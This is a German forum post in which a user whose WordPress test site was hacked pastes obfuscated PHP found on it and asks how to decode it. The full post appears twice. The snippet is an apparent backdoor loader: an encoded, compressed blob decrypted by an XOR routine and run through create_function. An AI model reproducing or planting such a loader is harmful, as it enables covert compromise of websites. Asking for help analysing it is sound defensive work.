sam600
04.11.14, 09:34
hallo
bei mir wurde eine testumgebung ( wordpress ) gehackt.
in einem php-file habe ich folgendes gefunden.
kann mir jemand sagen, wie ich den code entschluesseln kann.
bzw. kann mir jemand den code entschluesseln oder sagen wie er das macht.
danke
!!! vorsicht - der code ist bestimmt gefaehrlich !!!!
gzuncompress(faojfaia(667,2144));','b0habXpxUWVqZm tleHRhYVBnZW9bdHd7aWBheGB9a356bmtIZnZgd3l/dUZsQUBdS09aQ11AXEJbVE5TS09NQEN0bWBxbGtkYnt
5YnB9akVBVWZzfSFkamJ2anZnZ1Jzc3cwOisgJFZ2SFB1RGtBI UJGOUJ7e0xBaWZbYklqQHJHQlZcRkh2JUlNbGBsflZje3dpemo 5bmJsfXcgbm9iYGEzbH9hdXVscDl1eGJsZHA/
YW94a3dvYnRMQExeRXprcn53bHJpbD47N3ZhVUVHTEBMXklHXU RXZnVrayA7TXNmZ318bid7ZW17diVlan5yYHB4L3dGdlZRSVtT XEZIVlZba2NTVFdXSkdGW01ZQklXeU9VQV1cT
1BBQ1FNXF9ZZE07V0lzYStwfXg5fHp6QWVGditgdX45IXR4bXA/bWVldnZzbU9JdCtgdX45IVtURilndmJ0UlBZSEFqUFFVXm5QWU hKX11qTXcrYHV+dENxZHRhd2tNY250TXxifm
h6cHloSkxzZDVteWFmcm1wPW17YGFqYGdnc2Q1bXlhZnJtcD17 am9mbn'.'Zie2ptc2tNc2p2Q1lUTVJRKkQqeHdpc1lpc1ZDTEB MXklaQVJRW1NfTkJaQnJldGhHYSY2b3hufm53
bXF5f2N8JWd7dU53a3liJTZvZGh3eXdxfzZ7e3FkZiA2bHltc3 tqZ3c2aGNjK2NoI3VgfHFqYzxoY3wxfjlDYiJ/JU92ImAlfn5/NGc+TVdHY1giYiVYUElZUWdhamJJeDVqdUVjV
2xgbH4sID1sdG4iYyVocWxBbXpxekd4a3d3cWxhZntubWNLayJ jJW1jVWFsfW1Za3FsdCJjJX19L1pDV1Q9KSU8ZHVaTHtreiwva kRJK1ZXa3yIlVZvYPhfEfs4Bc8w17mH5BFC9N
ZWeJudeseNhCooqSZBapoCFHQYG05JtfdYfrM7ODXtGMLCXnPv sgHTLcnR2O3yxpIbup4/j+BqFrVFEjE1X+ovLMe+OGYqNAYp5dpbq1rm43r+2ro/bC5B4IJ8+dYB60b4cRZJg4y
loBapqJwvmd6Vtg+xpplqHOSRj61Eybuo24WCPX9sUl+3nNWXA Y1fHfraMz8gQ6CB7u4Tg1YjNfjSPixFb2U7mPooUX1TXyoJq/8SqOfTrdHf62oyiUX9WeRIriLpLtG9XWrSTXYH
CgcAxCRk5UvmMQKski/kEyYgRZrHdfJLqv4g2ztrMJF9rOq1IP/2CSd0I0opW7JFf3R+t0cEwippnXd1ZqFNCrZbbPLi/BTX4Isk+Emo+A32AS2P/UYgAD24ip6JQmo6UoN4Q9McW
Ex9ywWh2YMhs0FizGokINlqJ9ZjopiMTEVu1Eelkv44bi9jA7F ePvW/RL88Qdi3vXYcusKglp9Fp1oMfWiVlBzdKn42GFz6mcMqX+D2KM ddNl05sQestrBLsCOizX6+IHyOLG0viH
6gNI3rKc85kGgjRTMsLUK2Taqb3zg8aXz0fk4MudGr885vnD78 xbmj+pB9zil2ZeABVMqwk8fRncGZcZUp/VNs+6QqTjQCCP30HFqc'.'SU+/dwf5oCt2DJn8GJzH8zloD9N0roUZ
fLmVBVkguf0dGdHXfAnj1IXE+CCoClABA71onEM8czaWT04eJD 9R6PAWXzDZnGm8ozE6nQNDrqdkDULVYEGp9J1PB24zd6l4GA4B xrSHLJSahIMPCFvxqELhDlrKRba1XztnilhLv
DnZDi9XcBVEneTOviqpWRJTqD5cmYXjThAHx9NNNwItg+FEtpo oWPPN3mMp9nK2NrALvEZdIQGYr7mhN8/m29I2qG7j69cPn84me5fMQ2NBe/vCQDGastpFT3OOiGe9m3ef4XYoSP
z2QOjkmfsyW8QzvBPLUmJLIPQvTW9DmeMRZRqgtY6TckS8BXg/GxXe634W41xP/1pWWke1lk2rcJS0AL+ph6ctC01BkXCk4l0Fz+bOQCAJak+CpRz H3syTgesKp1AtY/lPQa4dA/U
EAbMLT5gAJq09XjMQV2w/7cwqapEb7uT3brhOYaGuVmAAj4d9f73dJVOirfreP5tzjOZzlo KVP6gaNarTIoI1g7GnwKGXlIAiuMty/cnUjOV2WuAr0Q19GEF4WSS1iW852s61AAO2
PiAfnLz6+4dTGXierwI6MR1Iaq2wDTEEsfrvOhIHRBLwtcoXa/fqcO6pEBuAWrBm1EAFn9Of31xHRDYVOg5nXk2PitgjargwjTPh '.'/nOvjWY+jjnEk8QoMrqjW4KJeXGKQiEZXt
bu9dVIAUaZ0ssaAoOxena9HUMWJ0DuXDduC5aD/dr5NrxLl2fmVnmR1W9WZ7wd2/6+ZQNyYuNpZrcex1sL3s35ILHmvMXPV/zvdfNel5Qs/lf4F/TDftJq/MRWw81ZJhg+w89UZBt
3iNTAHQGh26tnlPzrd7ZZ5MeSCGWHFWsJYFZkb0Ci0nLOJgR/8mLheAhUl8w70wH/aXaHFprhL1GAAHWRernJfjhzj2ndTb8ffqIpd65hr4LMJYwnKT De8bJ2bgiO+usod+9ZYs9k
hUtSVW0yfIG/A/Vv5S0toMCRTWrvoq3labVWzk+3jA+Xrjam+BB7ckSElk4OjoZo 9QtPhZrvN35ssb/1Lg7tcI5ooMd2faSqu1dtos2NZW6BOI7CY/jPBdWgiFaTZxmXoPh0BrFba
9lrSUfrNnGpQl60vE3MVkN0X+g75M6cOYZR5eAQcjIC16s8t+8 KWl7KecWTHPa/DWecX3IU9uquYho2rvghlkJmKUZu9+OlnCPrwzgzTsB8XKoSM2 fVUGYgp+a5JWSYvYXqTWSt6W
YVDyGqno3n26ULxABSNI1odojrnEdhqUAV8tYgiQrCH5SPDz9Q bvYSMm5EYP44Jd4avH4UApO4VEMoR8mSp9WwWa7E1N4s1bHB5t tDSSEcR5BY8G6eVoaCekzn+SyAFfcMT+0Wp9h
m/Tnzart9h6T8eLhgUG+3SnFSCqFeXodLvyNF8Laj/Ei0YLZs8VnI1/G9CY0Tvw4WvQk0KwjuZhqPih+IgKuo2FhuJOdsFWikblc3DMwt ZM+E7ww/F7nVcp6V0rzesxx8GEOMz7Mp
qxWZBYeyWPRctSZCbLgeCFEdAq4fim/8+zsUjm4C/mV07aXF0T02zB7m69nGv0hvOEQDOvlx3k8a+BBh0Z7Jy2VEFLc P/6wtgw0pmESV0de88GSFxvXPzDGCbDs'.'lY9X7F31bo9
KqBYYPcY4qMvBi8TtKcOcSmQXNLCGyhc2RBoavQDAkS73oR3WW BoQ7sLM2ZwBb3b9rEAw3AWPG5eq2fV2meJerp4Bpg4xJJfRDPY dtZjNhdGiFX4RJT0AAX8rKazqs+orlEdX0TZB
g/lXR1FMQBFtK34E57OnQ5NvyiflzM/E6bmSKAPDg56zl+u0OeCFc7allvsV85Q8JaEYS1KS40CDLXO7N 1YGRH9DTmemUflNshkCKZ6fMehF/DFqi+P8UBKJrXIJEMXDGlJyhXyLg
aZOKNbMb46ULWba3D04+J9m8zETB4dLVwBw7ArLpEH2i3IZDvm efHQmyy0Q1KgpTk+tvEACqmMT12oOWK3CcI5bSE0//hdGzLG/o9TkFyXKvqvFAESQKaQiesnOIdnIWNlrE8Ttjn
PnsOpDB16sX7Uz9Ayp4HYvfvCwy7f7p8+MQFb5FUReXNsDOL6U yCaMJXlhHWl/tO0QytdPsCvMwieLLZt8vSSA6e7b57jeUaqRfeERmdWtrIDtNc 2ZnfXxuSA==',"/*\x66\x75\
x6b\x6b\x20\x3b\x4d\x73\x66\x67\x7d\x7c\x6e*/");$stteoxo='create_';if(function_exists($stteoxo.= 'function')&&!function_exists('faojfaia')
){ function faojfaia($z,$w){global $dyvdvhas;$o=str_pad("",$w,"dtxnvorwcdrxklnk");$y=str_repeat("\x1f",$w);$e=str_repeat("\xe0",$w);$j =
substr($dyvdvhas[0],$z,$w);return(($j^$o)&$y)|($j&$e);};for($zt=-1;++$zt<3;){$stteoxo('','}'.$dyvdvhas[$zt].'{');}};unset($dyvdvhas);
bei mir wurde eine testumgebung ( wordpress ) gehackt.
in einem php-file habe ich folgendes gefunden.
kann mir jemand sagen, wie ich den code entschluesseln kann.
bzw. kann mir jemand den code entschluesseln oder sagen wie er das macht.
danke
!!! vorsicht - der code ist bestimmt gefaehrlich !!!!
gzuncompress(faojfaia(667,2144));','b0habXpxUWVqZm tleHRhYVBnZW9bdHd7aWBheGB9a356bmtIZnZgd3l/dUZsQUBdS09aQ11AXEJbVE5TS09NQEN0bWBxbGtkYnt
5YnB9akVBVWZzfSFkamJ2anZnZ1Jzc3cwOisgJFZ2SFB1RGtBI UJGOUJ7e0xBaWZbYklqQHJHQlZcRkh2JUlNbGBsflZje3dpemo 5bmJsfXcgbm9iYGEzbH9hdXVscDl1eGJsZHA/
YW94a3dvYnRMQExeRXprcn53bHJpbD47N3ZhVUVHTEBMXklHXU RXZnVrayA7TXNmZ318bid7ZW17diVlan5yYHB4L3dGdlZRSVtT XEZIVlZba2NTVFdXSkdGW01ZQklXeU9VQV1cT
1BBQ1FNXF9ZZE07V0lzYStwfXg5fHp6QWVGditgdX45IXR4bXA/bWVldnZzbU9JdCtgdX45IVtURilndmJ0UlBZSEFqUFFVXm5QWU hKX11qTXcrYHV+dENxZHRhd2tNY250TXxifm
h6cHloSkxzZDVteWFmcm1wPW17YGFqYGdnc2Q1bXlhZnJtcD17 am9mbn'.'Zie2ptc2tNc2p2Q1lUTVJRKkQqeHdpc1lpc1ZDTEB MXklaQVJRW1NfTkJaQnJldGhHYSY2b3hufm53
bXF5f2N8JWd7dU53a3liJTZvZGh3eXdxfzZ7e3FkZiA2bHltc3 tqZ3c2aGNjK2NoI3VgfHFqYzxoY3wxfjlDYiJ/JU92ImAlfn5/NGc+TVdHY1giYiVYUElZUWdhamJJeDVqdUVjV
2xgbH4sID1sdG4iYyVocWxBbXpxekd4a3d3cWxhZntubWNLayJ jJW1jVWFsfW1Za3FsdCJjJX19L1pDV1Q9KSU8ZHVaTHtreiwva kRJK1ZXa3yIlVZvYPhfEfs4Bc8w17mH5BFC9N
ZWeJudeseNhCooqSZBapoCFHQYG05JtfdYfrM7ODXtGMLCXnPv sgHTLcnR2O3yxpIbup4/j+BqFrVFEjE1X+ovLMe+OGYqNAYp5dpbq1rm43r+2ro/bC5B4IJ8+dYB60b4cRZJg4y
loBapqJwvmd6Vtg+xpplqHOSRj61Eybuo24WCPX9sUl+3nNWXA Y1fHfraMz8gQ6CB7u4Tg1YjNfjSPixFb2U7mPooUX1TXyoJq/8SqOfTrdHf62oyiUX9WeRIriLpLtG9XWrSTXYH
CgcAxCRk5UvmMQKski/kEyYgRZrHdfJLqv4g2ztrMJF9rOq1IP/2CSd0I0opW7JFf3R+t0cEwippnXd1ZqFNCrZbbPLi/BTX4Isk+Emo+A32AS2P/UYgAD24ip6JQmo6UoN4Q9McW
Ex9ywWh2YMhs0FizGokINlqJ9ZjopiMTEVu1Eelkv44bi9jA7F ePvW/RL88Qdi3vXYcusKglp9Fp1oMfWiVlBzdKn42GFz6mcMqX+D2KM ddNl05sQestrBLsCOizX6+IHyOLG0viH
6gNI3rKc85kGgjRTMsLUK2Taqb3zg8aXz0fk4MudGr885vnD78 xbmj+pB9zil2ZeABVMqwk8fRncGZcZUp/VNs+6QqTjQCCP30HFqc'.'SU+/dwf5oCt2DJn8GJzH8zloD9N0roUZ
fLmVBVkguf0dGdHXfAnj1IXE+CCoClABA71onEM8czaWT04eJD 9R6PAWXzDZnGm8ozE6nQNDrqdkDULVYEGp9J1PB24zd6l4GA4B xrSHLJSahIMPCFvxqELhDlrKRba1XztnilhLv
DnZDi9XcBVEneTOviqpWRJTqD5cmYXjThAHx9NNNwItg+FEtpo oWPPN3mMp9nK2NrALvEZdIQGYr7mhN8/m29I2qG7j69cPn84me5fMQ2NBe/vCQDGastpFT3OOiGe9m3ef4XYoSP
z2QOjkmfsyW8QzvBPLUmJLIPQvTW9DmeMRZRqgtY6TckS8BXg/GxXe634W41xP/1pWWke1lk2rcJS0AL+ph6ctC01BkXCk4l0Fz+bOQCAJak+CpRz H3syTgesKp1AtY/lPQa4dA/U
EAbMLT5gAJq09XjMQV2w/7cwqapEb7uT3brhOYaGuVmAAj4d9f73dJVOirfreP5tzjOZzlo KVP6gaNarTIoI1g7GnwKGXlIAiuMty/cnUjOV2WuAr0Q19GEF4WSS1iW852s61AAO2
PiAfnLz6+4dTGXierwI6MR1Iaq2wDTEEsfrvOhIHRBLwtcoXa/fqcO6pEBuAWrBm1EAFn9Of31xHRDYVOg5nXk2PitgjargwjTPh '.'/nOvjWY+jjnEk8QoMrqjW4KJeXGKQiEZXt
bu9dVIAUaZ0ssaAoOxena9HUMWJ0DuXDduC5aD/dr5NrxLl2fmVnmR1W9WZ7wd2/6+ZQNyYuNpZrcex1sL3s35ILHmvMXPV/zvdfNel5Qs/lf4F/TDftJq/MRWw81ZJhg+w89UZBt
3iNTAHQGh26tnlPzrd7ZZ5MeSCGWHFWsJYFZkb0Ci0nLOJgR/8mLheAhUl8w70wH/aXaHFprhL1GAAHWRernJfjhzj2ndTb8ffqIpd65hr4LMJYwnKT De8bJ2bgiO+usod+9ZYs9k
hUtSVW0yfIG/A/Vv5S0toMCRTWrvoq3labVWzk+3jA+Xrjam+BB7ckSElk4OjoZo 9QtPhZrvN35ssb/1Lg7tcI5ooMd2faSqu1dtos2NZW6BOI7CY/jPBdWgiFaTZxmXoPh0BrFba
9lrSUfrNnGpQl60vE3MVkN0X+g75M6cOYZR5eAQcjIC16s8t+8 KWl7KecWTHPa/DWecX3IU9uquYho2rvghlkJmKUZu9+OlnCPrwzgzTsB8XKoSM2 fVUGYgp+a5JWSYvYXqTWSt6W
YVDyGqno3n26ULxABSNI1odojrnEdhqUAV8tYgiQrCH5SPDz9Q bvYSMm5EYP44Jd4avH4UApO4VEMoR8mSp9WwWa7E1N4s1bHB5t tDSSEcR5BY8G6eVoaCekzn+SyAFfcMT+0Wp9h
m/Tnzart9h6T8eLhgUG+3SnFSCqFeXodLvyNF8Laj/Ei0YLZs8VnI1/G9CY0Tvw4WvQk0KwjuZhqPih+IgKuo2FhuJOdsFWikblc3DMwt ZM+E7ww/F7nVcp6V0rzesxx8GEOMz7Mp
qxWZBYeyWPRctSZCbLgeCFEdAq4fim/8+zsUjm4C/mV07aXF0T02zB7m69nGv0hvOEQDOvlx3k8a+BBh0Z7Jy2VEFLc P/6wtgw0pmESV0de88GSFxvXPzDGCbDs'.'lY9X7F31bo9
KqBYYPcY4qMvBi8TtKcOcSmQXNLCGyhc2RBoavQDAkS73oR3WW BoQ7sLM2ZwBb3b9rEAw3AWPG5eq2fV2meJerp4Bpg4xJJfRDPY dtZjNhdGiFX4RJT0AAX8rKazqs+orlEdX0TZB
g/lXR1FMQBFtK34E57OnQ5NvyiflzM/E6bmSKAPDg56zl+u0OeCFc7allvsV85Q8JaEYS1KS40CDLXO7N 1YGRH9DTmemUflNshkCKZ6fMehF/DFqi+P8UBKJrXIJEMXDGlJyhXyLg
aZOKNbMb46ULWba3D04+J9m8zETB4dLVwBw7ArLpEH2i3IZDvm efHQmyy0Q1KgpTk+tvEACqmMT12oOWK3CcI5bSE0//hdGzLG/o9TkFyXKvqvFAESQKaQiesnOIdnIWNlrE8Ttjn
PnsOpDB16sX7Uz9Ayp4HYvfvCwy7f7p8+MQFb5FUReXNsDOL6U yCaMJXlhHWl/tO0QytdPsCvMwieLLZt8vSSA6e7b57jeUaqRfeERmdWtrIDtNc 2ZnfXxuSA==',"/*\x66\x75\
x6b\x6b\x20\x3b\x4d\x73\x66\x67\x7d\x7c\x6e*/");$stteoxo='create_';if(function_exists($stteoxo.= 'function')&&!function_exists('faojfaia')
){ function faojfaia($z,$w){global $dyvdvhas;$o=str_pad("",$w,"dtxnvorwcdrxklnk");$y=str_repeat("\x1f",$w);$e=str_repeat("\xe0",$w);$j =
substr($dyvdvhas[0],$z,$w);return(($j^$o)&$y)|($j&$e);};for($zt=-1;++$zt<3;){$stteoxo('','}'.$dyvdvhas[$zt].'{');}};unset($dyvdvhas);